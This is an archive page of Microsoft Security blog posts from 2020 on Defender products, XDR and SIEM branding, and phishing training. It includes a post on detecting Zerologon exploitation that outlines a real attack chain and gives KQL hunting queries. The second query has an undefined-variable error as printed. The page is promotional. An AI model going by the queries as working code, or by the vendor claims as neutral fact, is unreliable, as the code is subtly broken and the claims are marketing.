Archive

Archive for the ‘Microsoft Defender Advanced Threat Protection’ Category

Digital Defense integrates with Microsoft to detect attacks missed by traditional endpoint security

December 8th, 2020 No comments

This blog post is part of the Microsoft Intelligent Security Association (MISA) guest blog series. You can learn more about MISA here

Cybercriminals have ramped up their initial compromises through phishing and pharming attacks using a variety of tools and tactics that, while numerous, are simple and often go undetected. One technique that attackers continue to leverage to obfuscate their activity and remain undetected is dwell time.

Dwell is the time between the initial compromise and the point when the attack campaign is identified. While industry reports offer differing averages for dwell time, I have yet to see reporting that presents an average below the 50 to 60-day range. Read more about advanced endpoint protection and dwell time.

Bolster Your Advanced Endpoint Protection (AEP)

Download the Digital Defense white paper here.

While dwell times have slightly decreased as attackers become less patient, they are still significant enough to evade the plethora of security tools that exist today. The challenge with these tools is their inability to piece together attacker activity over long periods. By the time enough indicators of compromise (IoC) reveal themselves to be detected, it is often too late to prevent a breach. Most monitoring solutions look for attacker activity to identify a potential indicator of compromise. However, the best way to combat dwell time is to identify and eradicate dormant or nascent malware that stays well-hidden before they periodically activate.

A layered Solution

Frontline Active Threat Sweep™ (Frontline ATS™), integrated with Microsoft Defender for Endpoint, identifies malware designed to actively evade EDR solutions. Frontline ATS™ is part of the Digital Defense Frontline.Cloud platform providing on-demand agentless threat detection that proactively analyzes assets for indications of a malware infection before other agent-based security tools can be deployed. When integrated, Frontline ATS augments Defender for Endpoint’s capabilities by identifying hidden IoCs without adding agents.

Placeholder

The ability to stay undetected for long periods of time is one of the most common and challenging tactics that attackers use to execute a successful breach. In addition, even when a security team using monitoring tools or an incident response (IR) service is able to detect a threat and clean up an infection, it is common to see it repeatedly resurface. This is because even though all active indicators of the threat have been investigated and addressed, if the initial, and often inactive, installation of malware is not discovered due to inactivity, it can later be re-activated to re-spark an infection. With Frontline ATS and Defender for Endpoint, security teams can find any source, artifact, or inactive remnants of malware that could restart the attack campaign. Defender for Endpoint and Frontline ATS provides comprehensive and unobtrusive advanced endpoint detection, protection, and response for drastically improving the security operations team’s effectiveness at preventing breaches.

To learn about the Digital Defense Frontline ATS integration with Microsoft Defender for Endpoint, please visit our listing in the Microsoft Azure Marketplace or visit Digital Defense to learn more.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

For more information about Microsoft Security Solutions, visit the Microsoft Security website. Bookmark the Security blog to keep up with our expert coverage of security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Digital Defense integrates with Microsoft to detect attacks missed by traditional endpoint security appeared first on Microsoft Security.

Zerologon is now detected by Microsoft Defender for Identity

November 30th, 2020 No comments

There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. Microsoft Defender for Identity along with other Microsoft 365 Defender solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.

Here is a sneak peek into our detection lifecycle

Whenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected WannaCry attacks and with the alert for Suspected SMB (Small and Medium Businesses) packet manipulation (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.

Over the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.

This lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.

Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020

Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020

Microsoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.

Alert page experience

Figure 2: Alert page experience

With this Microsoft Defender for Identity alert, you will be able to identify:

  • The device that attempted the impersonation.
  • The domain controller.
  • The targeted asset.
  • Whether the impersonation attempts were successful.

Finally, customers using Microsoft 365 Defender can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from Microsoft Defender for Endpoint. This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.

A close look at some of the earliest ZeroLogon attacks

ZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, Microsoft Threat Experts observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.

Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale

Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale

One of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.

Using the @MsftSecIntel Twitter handle, we publicly shared some file indicators used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.

Placeholder

Hunting for ZeroLogon in Microsoft 365 Defender

Combining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&CK framework, and machine learning models.

In this section, we provide an example (in the simplified form of an advanced hunting query) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.

The following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.

Placeholder

First, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.

// Find all Netlogon exploit attempt alerts containing source devices
let queryWindow = 3d;
AlertInfo
| where Timestamp > ago(queryWindow)
| where ServiceSource == "Azure ATP"
| where Title == "Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)"
| join (AlertEvidence
| where Timestamp > ago(queryWindow)
| where EntityType == "Machine"
| where EvidenceDirection == "Source"
| where isnotempty(DeviceId)
) on AlertId
| summarize by AlertId, DeviceId, Timestamp

Next, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:

// Find potential endpoint Netlogon exploit evidence from AlertId
let NLAlertId = "insert alert ID here";
let lookAhead = 1m;
let lookBehind = 6m;
let NLEvidence = AlertEvidence
| where AlertId == NLAlertId
| where EntityType == "Machine"
| where EvidenceDirection == "Source"
| where isnotempty(DeviceId)
| summarize Timestamp=arg_min(Timestamp, *) by DeviceId;
let sourceMachine = NLEvidence | distinct DeviceId;
let alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp));
DeviceNetworkEvents
| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead))
| where DeviceId in (sourceMachine)
| where RemotePort == 135 or RemotePort between (49670 .. 49680)
| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl
| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl

This query can return a result that looks like this:

Tying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.

Defend against ZeroLogon

Learn more about the alert here, along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.

Also, feel free to review our guidance on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability

Customers with Microsoft Defender for Endpoint can get additional guidance from the threat analytics article available in Microsoft Defender Security Center.

Get started today

Are you just starting your Microsoft Defender for Identity journey? Begin a trial of Microsoft 365 Defender to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.

Join the Microsoft Defender for Identity Tech Community for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zerologon is now detected by Microsoft Defender for Identity appeared first on Microsoft Security.

Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security

October 5th, 2020 No comments

Phishing is still one of the most significant risk vectors facing enterprises today. Innovative email security technology like Microsoft Defender for Office 365 stops a majority of phishing attacks before they hit user inboxes, but no technology in the world can prevent 100 percent of phishing attacks from hitting user inboxes. At that point in time, your employees become your defenders. They must be trained to recognize and report phishing attacks. But not all training is equally proficient.

This blog examines the current state of security awareness training, including how you can create an intelligent solution to detect, analyze, and remediate phishing risk. You’ll also learn about an upcoming event to help you get data-driven insights to compare your current phishing risk level against your peers.

A new reality for cybersecurity

The Chief Information Security Officer (CISO) at a modern enterprise must contend with a myriad of threats. The hybrid mix of legacy on-premises systems and cloud solutions, along with the proliferation of employee devices and shadows, means your security team needs a new and comprehensive view of phishing risk across the organization. Self-reported training completion metrics don’t provide insights into behavior changes or risk reduction, leading CISOs to distrust these metrics. Improvement in employee behavior becomes difficult to measure, leaving them anxious that employee behavior has improved at all.

Many information workers view security awareness training as a tedious interruption that detracts from productivity. Often when an employee is compromised during a simulated attack, they find the ensuing training to be punitive and navigate away from the training like nothing happened. Worse, simulations are often out-of-context and don’t make sense for the employee’s industry or function.

People-centric protection

Making secure behaviors a part of people’s daily habits requires a regular program of targeted education combined with realistic simulations. That means regular breach and attack simulations against endpoints, networks, and cloud security controls. Microsoft Defender for Office 365 now features simulations to help you detect and remediate phishing risks across your organization. Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, helps you gain visibility over organizational risk, the baseline against predicted compromise rates, and prioritize remediations. To learn more about this capability, watch the product launch at Microsoft Ignite 2020

Terranova Security employs a pedagogical approach to cybersecurity, including gamification and interactive sessions designed to engage users’ interest. The simulations are localized for employees around the world and follow the highest web content accessibility guidelines (WCAG) 2.1. You will be able to measure employee behavior changes and deploy an integrated, automated security awareness program built on three pillars of protection:

  • Simulate real threats: Detect vulnerabilities by using real lures (actual phishing emails) and templates, training employees on the most up-to-date threats. Administrators can automate and customize simulations, including payload attachment, user targeting, scheduling, and cleanup. Azure Active Directory (AAD) groups automate user importing, and the vast library of training content enables personalized training based on a user’s vulnerability score or simulation performance.
  • Remediate intelligently: Quantify your social engineering risk across employees and threat vectors to accurately target remedial training. Measure the behavioral impact and track your organization’s progress against a baseline compromise rate. Set up automated repeat offender simulations with the user susceptibility metric and add context by correlating behavior with a susceptibility score.
  • Improve your security posture: Reinforce your human security system with hyper-targeted training designed to change employee Attack Simulation Training in Microsoft Defender for Office 365 provides nano learnings and micro learnings” to cater to diverse learning styles to reinforce awareness.

Check your threat level

Coinciding with National Cyber Security Awareness Month (NCSAM),  Terranova will release the results at the end of October from their the Terranova Security Gone Phishing Tournament™. This popular event helps security leaders get an up-to-the-minute picture of their organization’s phishing click rate. Terranova launched this campaign back in August and supplied a free phishing simulation for its applicants and enabled them to benchmark themselves against their peers, giving them accurate click-rate data for comparison.

Co-sponsored by Microsoft, the Terranova Security Gone Phishing Tournament uses an email template from Attack simulation training—a new capability of Office 365 ATP releasing later this year—that acts as an intelligent social engineering risk management tool using context-aware simulations and targeted training.

To learn more about Microsoft Security solutions, visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security appeared first on Microsoft Security.

Microsoft delivers unified SIEM and XDR to modernize security operations

September 22nd, 2020 No comments

The threat landscape continues to increase in both complexity and the level of sophistication of the attacks we observe. Attackers target the most vulnerable resources in an organization and then traverse laterally to target high-value assets. No longer can you expect to stay safe by protecting individual areas such as email or endpoints. Extended detection and response (XDR) is a new approach defined by industry analysts that are designed to deliver intelligent, automated, and integrated security across domains to help defenders connect seemingly disparate alerts and get ahead of attackers.

At today’s virtual Ignite conference, Microsoft is announcing a unique approach that empowers security professionals to get ahead of today’s complex threat landscape with integrated SIEM and XDR tools from a single vendor so you get the best of both worlds – end-to-end threat visibility across all of your resources; correlated, prioritized alerts based on the deep understanding Microsoft has of specific resources and AI that stitches that signal together; and coordinated action across the organization. With the combination of SIEM and XDR, defenders are now armed with more context and automation than ever and can leverage the time saved to apply their unique expertise within their own environment to proactively hunt and implement threat preventions.

As part of this announcement, we are unifying all XDR technologies under the Microsoft Defender brand. The new Microsoft Defender is the most comprehensive XDR in the market today and prevents, detects, and responds to threats across identities, endpoints, applications, email, IoT, infrastructure, and cloud platforms. With Microsoft Defender we are both rebranding our existing threat protection portfolio and adding new capabilities, including additional multi-cloud (Google Cloud and AWS) and multi-platform (Windows, Mac, Linux, Android, and iOS) support.

Microsoft Defender is delivered in two tailored experiences, Microsoft 365 Defender for end-user environments and Azure Defender for cloud and hybrid infrastructure.

Microsoft 365 Defender

Microsoft 365 Defender delivers XDR capabilities for identities, endpoints, cloud apps, email and documents. It uses artificial intelligence to reduce the SOC’s work items, and in a recent test we consolidated 1,000 alerts to just 40 high-priority incidents. Built-in self-healing technology fully automates remediation more than 70% of the time, ensuring defenders can focus on other tasks that better leverage their knowledge and expertise.

Today, we are making the following branding changes to unify the Microsoft 365 Defender technologies:

  • Microsoft 365 Defender (previously Microsoft Threat Protection).
  • Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection).
  • Microsoft Defender for Office 365 (previously Office 365 Advanced Threat Protection).
  • Microsoft Defender for Identity (previously Azure Advanced Threat Protection).

New features within Microsoft 365 Defender will also be available:

  • Extending mobile threat defense capabilities in Microsoft Defender for Endpoint to iOS (now in Preview) and Android support now moves to GA. As a result, Microsoft now delivers endpoint protection across all major OS platforms. Learn more about the latest in our endpoint security journey.
  • Extension of current macOS support with the addition of threat and vulnerability management. You can learn more here.
  • Priority account protection in Microsoft Defender for Office 365 will help security teams focus on protection from phishing attacks for users who have access to the most critical and privileged information. Customers can customize prioritized account workflows to offer these users an added layer of protection. Learn more here.

An image of the Microsoft 365 Defender dashboard.

Microsoft 365 Defender

Azure Defender

Azure Defender delivers XDR left capabilities to protect multi-cloud and hybrid workloads, including virtual machines, databases, containers, IoT, and more. Azure Defender is an evolution of the Azure Security Center threat protection capabilities and is accessed from within Azure Security Center.

Aligned with the Microsoft 365 brand changes, today we are announcing brand changes for these capabilities under Azure Defender, for example:

  • Azure Defender for Servers (previously Azure Security Center Standard Edition).
  • Azure Defender for IoT (previously Azure Security Center for IoT).
  • Azure Defender for SQL (previously Advanced Threat Protection for SQL).

We are also announcing new features will also be available within Azure Defender:

  • To help defenders identify and mitigate unprotected resources we are delivering a new unified experience for Azure Defender that makes it easy to see which resources are protected and which need protection. This updated experience can be accessed here and will be made broadly available later this month.
  • Added protection for SQL servers on-premises and in multi-cloud environments as well as virtual machines in other clouds, and improved protections for containers, including Kubernetes-level policy management and continuous scanning of container images in container registries.
  • Support for operational technology networks with the integration of CyberX into Azure Defender for IoT.

An image of Defender.

Defender

Azure Sentinel

The XDR capabilities of Microsoft Defender delivered through Azure Defender and Microsoft 365 Defender provides rich insights and prioritized alerts, but to gain visibility across your entire environment and include data from other security solutions such as firewalls and existing security tools, we connect Microsoft Defender to Azure Sentinel, our cloud-native SIEM.

Azure Sentinel is deeply integrated with Microsoft Defender so you can integrate your XDR data in only a few clicks and combine it with all your security data from across your entire enterprise.

Today, we are announcing new features within Azure Sentinel:

  • The new entity behavior analytics view makes it easier to diagnose compromised accounts or malicious insiders.
  • Simplify management of threat intelligence by including the ability to search, add, and track threat indictors, perform threat intelligence lookups, and create watchlists. To learn more about these in detail, check out the Azure Sentinel blog.

An image of Azure Sentinel.

Azure Sentinel

Modernize your security operations

Some vendors deliver XDR, some deliver SIEM. Microsoft believes that defenders can benefit from using deeply integrated SIEM and XDR for end-to-end visibility and prioritized actionable insights across all your enterprise assets. We are committed to delivering the best-integrated experience with the broadest coverage of resources to help simplify your world.

Thank you for your continued partnership and invaluable input on this journey to deliver the most comprehensive threat protection to our global customers.

Infographic of Microsoft 365 Defender and Azure Defender

YouTube video: Microsoft Defender, Extended Detection and Response (XDR) | Microsoft Ignite 2020

Stay healthy. Stay safe.

-Rob & our entire Microsoft Security Team

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft delivers unified SIEM and XDR to modernize security operations appeared first on Microsoft Security.

Microsoft announces cloud innovation to simplify security, compliance, and identity

September 22nd, 2020 No comments

2020 will be remembered as a year of historic transformation. The pandemic has changed the way businesses operate and people work. One thing that has not changed is our basic human nature and the need to feel safe. Being safe and feeling safe is what allows us to do more, create more, and have trust in the technology that connects us all.

It’s no wonder, then, that cyber-security is so important right now. Digital security is about people—it’s about empowering defenders to defend and protect employees, data, work, and personal safety. It’s about making people and organizations resilient in an environment of unexpected change, like widespread remote work. Nearly overnight, organizations worldwide have had to enable remote workforces, support rapidly evolving business requirements, and steer to the next normal without knowing what that normal would be.

All of this takes place against a backdrop of advanced threats and adversaries. For example, Microsoft threat intelligence teams recently exposed cyberattacks targeting people and organizations involved in the upcoming U.S. presidential election including unsuccessful attacks on people associated with both presidential campaigns from a variety of foreign activity groups known to Microsoft as Strontium, Zirconium, and Phosphorus.

For those responsible for securing their organization’s digital infrastructure, this has all come on top of what they were already navigating—levels of complexity that often translate into barriers for companies, their people, and the customers they serve. That’s why we’re so passionate about reimagining security, identity, and compliance. We hold a differentiated view among our peers that security should not only encompass all critical aspects of security—including cybersecurity, identity, and compliance – but that these components should be tightly integrated, and built right into the products and platforms that businesses are already using, so that managing safe access, securing data, meeting regulatory requirements and protecting against threats is seamless.

Countless innovative companies like ASOS, CenturyLink, Erie Insurance, Frost Bank, Rabobank, Unilever, Rockefeller Capital Management, Uniper, Komatsu, and The Little Potato Company; and public sector organizations including the US Department of Defense, New Jersey Administrative Office of the Courts, Ashford & St. Peter’s Hospitals (NHS), St. Luke’s, and Durham University are tapping into the Microsoft cloud to help secure their futures. Today we’re delivering a new set of security, compliance, and identity innovations to help all customers simplify and modernize their environments by embracing the reality that the past seven months have likely reshaped the next 10 years of security and digital transformation.

Modern security with a new Microsoft Defender

Poor security posture is often rooted in complexity. Security teams have historically struggled to keep up with threats and signals across a patchwork of poorly integrated solutions that fail to cover the breadth of workloads, clouds, and devices that businesses run on. Fortunately, the cloud has given rise to a new generation of modern security tools that simplify the defender experience by combining signals and automating responses to catch threats that would otherwise go unchecked. The most important emerging tools are Extended Detection and Response (XDR) and cloud-native Security Information & Event Management (SIEM). Most vendors only offer one or the other.

Microsoft offers a unique approach that empowers security professionals with both cloud-native SIEM and XDR tools from a single vendor. This brings a new level of integration that gives defenders the best of both worlds—an end to end visibility across all of their resources and intelligent alerts built with a deep understanding of individual resources, enhanced with human and machine intelligence.

Today we are making the following announcements to simplify the defender experience with modern and integrated capabilities:

  • We are unifying all of our XDR capabilities together and rebranding them as Microsoft Defender, inclusive of Microsoft 365 Defender and Azure Defender.
  • Microsoft Defender offers the broadest resource coverage of any XDR in the industry, spanning identities, endpoints, cloud apps, email and docs, infrastructure, and cloud platforms.
  • Microsoft Defender uses powerful workflows and AI to correlate alerts across attack vectors, provide an end-to-end view of the attack, and automatically heal affected assets.

In addition to bringing our XDR together under Microsoft Defender, we are also announcing new Defender capabilities:

  • Microsoft Defender for Endpoint is now available for all major platforms, with the general availability of protection for Android devices and a preview for iOS.
An image of Microsoft Defender for Endpoint on an Android device.
Microsoft Defender for Endpoint on an Android device
  • Azure Defender has a new unified dashboard experience within Azure Security Center that gives you visibility into your alerts and which resources are currently monitored.
  • Azure Defender has new protections for SQL on-premises, Azure Kubernetes, Azure Key Vault, and IoT.
  • Azure Defender for IoT now protects industrial IoT, Operational Technology (OT), and building management systems (BMS) with the integration of CyberX’s agentless capabilities for securing unmanaged devices acquired in June.

Our cross-domain detection and response capabilities from Microsoft Defender are deeply integrated with our cloud-native SIEM, Azure Sentinel, reducing complexity and increasing visibility so that defenders see what matters when it matters.  In Azure Sentinel we are announcing:

  • Improvements to threat intelligence management and new integrations with threat intelligence partners, including the ability to search, add, and track threat indicators, perform TI look-ups, and enrichments as well as creating watchlists for hunting threats—so you can catch more threats, faster.
  • User and entity behavior analytics that help SecOps detect unknown threats and anomalous behavior of compromised users and insider threats. New insights are unlocked with user and entity behavior profiles that leverage machine learning and Microsoft’s security research.
  • To help Microsoft 365 E5 customers modernize faster, we are offering promotional pricing that will save the typical 3,500 seat deployment $1,500 per month—for a limited time, beginning in November 2020.

ASOS, a leading online fashion retailer, is using Azure Sentinel to detect attacks even while their security team is working remotely during the pandemic.

A headshot of tuart Gregg, Cyber Security Operations Lead, ASOS.
Stuart Gregg, Cyber Security Operations Lead, ASOS

“With everything running through Azure Sentinel, we’ve reduced the time spent on case management and resolution of alerts by approximately 50 percent.” said Stuart Gregg, Cyber Security Operations Lead, ASOS. 

In addition to the XDR and SIEM news, we are enhancing security posture management in Azure Security Center with support for multi-cloud.  Now you can see all your Azure, AWS, and GCP security posture in a unified experience within Azure Security Center. Learn more about today’s Azure security announcements here.

Compliance, simplified

Our compliance cloud solutions help customers more easily navigate today’s biggest risks, from managing data or finding insider threats to dealing with legal issues or even addressing standards and regulations. We’ve listened to customers and invested heavily in a set of solutions to help them modernize and keep pace with the evolving and complex compliance and risk management challenges they face.

  • One of our key investment areas is the set of Data Loss Prevention products in Microsoft 365. We recently announced the public preview of Microsoft Endpoint Data Loss Prevention (DLP), which means customers can now identify and protect data on devices. Today, we are announcing the public preview of integration between Microsoft Cloud App Security and Microsoft Information Protection, which extends Microsoft’s data loss prevention (DLP) policy enforcement framework to third-party cloud apps—such as Dropbox, Box, Google Drive, Webex, and more—for a consistent and seamless compliance experience
  • Customers struggle to keep up with the constantly changing regulations around data protection. To help ease this challenge, we are excited to announce the general availability of Compliance Manager to help businesses simplify compliance and reduce risk by translating complex regulatory requirements to specific controls and through compliance score, get a quantifiable measure of compliance.
A headshot of Edward Contreras, CISO, EVP, Frost Bank.
Edward Contreras, CISO, EVP, Frost Bank

Customers like Frost Bank have found that tracking their compliance score makes compliance easier.

“Compliance is a really interesting field. Typically, you have somebody with a legal background, a risk background, or a security background, but very little technical background. And so trying to translate a regulation so that it fits within a technical environment is very difficult. With Compliance Manager, it actually allowed a lot of the tech talk to be translated for the side, the business side, but it also allowed a lot of the business side to be translated to the tech side. For us, it made the conversation very simple and it made the process almost seamless,” said Edward Contreras, CISO, EVP, Frost Bank.

The power of modern cloud-based identity protection

Nothing has done more to simplify the security challenges of remote work during the pandemic than modern identity solutions and Zero Trust architectures. A July 2020 Microsoft poll found that 94 percent of business leaders have already embarked on a Zero Trust journey. Identity is central to simplifying security today and shaping the next generation of the modern security infrastructure.

Microsoft is pushing the frontier of identity through the introduction of a decentralized model built on open standards to help balance the power between individuals and organizations in ways that enhance digital trust while protecting the privacy and reducing the risk of losing personal data.

  • Today we are announcing a decentralized identity pilot together with the MilGears educational program of the US Department of Defense and Trident at AIU, which helps military veterans and service members enroll in higher education and jumpstart their civilian career.

This technology will significantly reduce the time and effort it takes for veterans to verify their service records and transcripts with universities and employers. It will also help veterans maintain control of their information.

In a pilot of decentralized identity, Trident University can quickly and easily verify transcripts presented by MilGears participants.
In a pilot of decentralized identity, Trident at AIU can quickly and easily verify transcripts presented by MilGears participants.

The simplest way to manage identities and embark on a Zero Trust journey today is with Azure Active Directory (AD)—Microsoft’s cloud identity service, trusted by over 200 thousand organizations. They choose Azure AD for industry-leading security and seamless user experience.

Doug Howell, Director of IT, The Little Potato Company
Doug Howell, Director of IT, The Little Potato Company

No company or industry is immune to attack and everyone deserves modern protection. The Little Potato Company is a family-owned business with 400 employees headquartered in Alberta, Canada that uses Conditional Access as a critical component in its Zero Trust security strategy. The Little Potato Company recently saw the value of Zero Trust security firsthand when a user’s credentials were compromised and used to attempt to access corporate data. Luckily, the company had deployed Azure AD and Conditional Access, which quickly identified and blocked the login attempts from multiple locations and an unfamiliar operating system.

What you can do today

Security is a journey, and we believe in progress over perfection. The key is that every step you take in the process makes your organization safer and simpler. In fact, it makes all of us safer as we work together to stop malicious activity from causing harm and to protect data and privacy in a modern, connected world.

Here are four things you can do today to make your organization safer and more resilient:

  1. Use multi-factor authentication. Move toward passwordless.
  2. Have a plan for keeping software up to date and patch, patch, patch!
  3. Get a handle on all devices connecting to your network, from phones and laptops to edge devices, and how you’re detecting potential threats to all of them.
  4. Use benchmarks and insights like Microsoft Secure Score and Compliance Manager to understand your posture and track your progress.

2020 is marking a moment in time that none of us could have imagined; a moment that has amplified the need for a resilient response to unexpected change, and a moment in which digital safety is paramount to productivity and the peace of mind we all need to be at our best.​ We’re inspired by the way customers are using technology to turn obstacles into innovation, to turn ideas into solutions, and to embrace today’s challenges as an opportunity to build a better, safer world for all.​ That’s why we at Microsoft are reimagining security, identity, and compliance—to empower all people and organizations to thrive.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Microsoft Security blog to keep up with our expert coverage on security matters. Follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft announces cloud innovation to simplify security, compliance, and identity appeared first on Microsoft Security.

3 ways Microsoft 365 can help you reduce helpdesk costs

September 3rd, 2020 No comments

With more people than ever working remotely, organizations must maximize employee productivity while protecting an ever-growing digital footprint. Many have stitched together specialized security solutions from different vendors to improve their cybersecurity posture, but this approach is expensive and can result in gaps in coverage and a fragmented user experience. With Microsoft’s integrated security solutions, you can enhance security and user productivity more cost-effectively.

Focusing a lens on the helpdesk illuminates how consolidating with Microsoft helps streamline and strengthen your security posture. Your helpdesk plays an important role in enabling employees to be more effective, but it can also reveal organization-wide productivity challenges. Productivity matters because if security controls are too cumbersome, employees will find workarounds. In this blog, I’ll highlight three examples of how Microsoft 365 can help you reduce costs while strengthening cybersecurity.

1. Reduce password reset calls by 75 percent

One of the most common reasons that employees call the helpdesk is to reset their password. These calls result in a loss of productivity for employees who are locked out of their accounts. They also require employees and helpdesk analysts to take time out of their busy days to work through steps to reset the password. With a high volume of calls, the costs add up.

The best way to reduce password reset calls is to eliminate passwords entirely. Microsoft has built in support for passwordless authentication methods such as biometrics, FIDO-2 security keys, and PINs into all our products and services. Because they are encrypted and stored locally on your users devices, these methods are more secure than passwords and easier for employees—and they can reduce your costs. When Microsoft rolled out passwordless to our employees the hard and soft costs of supporting passwords fell by 87 percent.

Deploying passwordless is a phased journey and not everyone is ready to start that process now, so it’s important to also improve productivity for password users. Azure Active Directory (Azure AD) is an identity and access management solution that allows users to sign in to all their on-premises and cloud apps with one set of credentials—whether they use passwords or passwordless methods. With single sign-on employees will have far fewer passwords to remember; however, sometimes they may still forget or Azure AD may force them to reset a password if an account appears compromised. In either case, Azure AD self-service password reset lets employees unblock their accounts, on their time, via an online portal.

According to a new study, The Total Economic Impact™ of Securing Apps with Microsoft Azure Active Directory, Azure AD self-service password reset can reduce the number of password reset calls per month by 75 percent. In this commissioned study, Forrester Consulting developed a composite organization based on interviews with four customers in different industries who have used Azure AD for years. Deploying Azure AD self-service password reset resulted in a return on investment of USD 1.7 million over three years.

 

2. Streamline Windows 10 upgrade path

Twice a year Microsoft releases new features and security capabilities for Windows 10. Typically, users are able to download the new operating system and quickly get back to work—but if you use a non-Microsoft product for endpoint detection or antivirus, it can complicate the process.

When a non-Microsoft vendor’s security product is not compatible with a new version of Windows 10, it prevents users from upgrading. This can be confusing for employees, who call the helpdesk for assistance. In addition to facilitating these calls, your team must also run software compatibility testing once a new version of the security software is released. Meanwhile, your company can’t take advantage of the productivity and security features available in the latest version of Windows 10.

To reduce dependencies without compromising security, turn on Microsoft Defender Antivirus and Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP). Microsoft Defender ATP helps you protect, detect, and respond to advanced attacks against all your endpoints. Microsoft Defender Antivirus, a Microsoft Defender ATP capability, uses artificial intelligence and machine learning to find and block malware and other viruses. Both solutions are designed to work together and are integrated with Windows 10, which reduces the likelihood of helpdesk calls during the upgrade process.

An image of Microsoft Defender ATP.

3. Empower uses to manage their devices

A third driver of helpdesk calls is device management. Any time an employee needs help with a device, such as when they start a new job or want to use a personal device to access email, a helpdesk analyst is often involved. The analyst sets up devices with the appropriate applications and permissions and troubleshoots challenges with access.

As the way we work has changed, people no longer access corporate resources solely from the office using company-provided devices. Reading emails from a coffee shop on a personal phone or reviewing presentations from a tablet makes working more convenient, but it can also introduce security challenges. Employees may not upgrade their devices or apply security patches in a timely manner. They sometimes, unknowingly, download apps with security flaws. Attackers leverage these vulnerabilities to gain access to sensitive company resources.

